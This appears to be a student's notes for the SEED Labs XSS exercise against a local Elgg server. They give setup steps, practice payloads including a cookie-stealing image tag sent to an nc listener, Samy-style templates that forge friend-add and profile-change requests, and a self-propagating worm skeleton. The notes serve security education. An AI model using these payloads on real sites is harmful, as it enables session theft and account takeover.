Setup your environemnt:
-------------------------------------------------------------------------------
Adding DNS records:
sudo su
chmod 777 hosts
mousepad hosts
<copy paste the following record and save>
10.9.0.5 www.seed-server.com

Get labsetup files
wget https://seedsecuritylabs.org/Labs_20.04/Files/Web_XSS_Elgg/Labsetup.zip
docker-compose build
docker-compose up

Practice Scripts:
-------------------------------------------------------------------------------
P 1:
<script>alert('XSS');</script>

P 2:
<script>alert(document.cookie);</script>

P 3:
nc -lknv 5555

<script>document.write('<img src=http://127.0.0.1:5555?c='
+ escape(document.cookie) + ' >');
</script> 

Task 1:
-------------------------------------------------------------------------------- 
<script type="text/javascript">
	window.onload = function () {
	var Ajax=null;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;
	//Construct the HTTP request to add Samy as a friend.

	var sendurl=...; //FILL IN

	//Create and send Ajax request to add friend
	Ajax=new XMLHttpRequest();
	Ajax.open("GET",sendurl,true);
	Ajax.setRequestHeader("Host","www.seed-server.com");
	Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	Ajax.send();
	}
</script>

Task 2:
<script type="text/javascript">
	window.onload = function(){
	//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
	//and Security Token __elgg_token
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;
	//Construct the content of your url.
        var sendurl=...; //FILL IN
	var content=...; //FILL IN
	
	if(//Condition to check if the user is not Samy)
	{
		//Create and send Ajax request to modify profile
		var Ajax=null;
		Ajax=new XMLHttpRequest();
		Ajax.open("POST",sendurl,true);
		Ajax.setRequestHeader("Host","www.seed-server.com");
		Ajax.setRequestHeader("Content-Type",
		"application/x-www-form-urlencoded");
		Ajax.send(content);
	}
	}
</script>

Task 4:
<script id=worm>
	var headerTag = "<script id=\"worm\" type=\"text/javascript\">";
	var jsCode = document.getElementById("worm").innerHTML;
	var tailTag = "</" + "script>";
	var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
	alert(jsCode);
</script>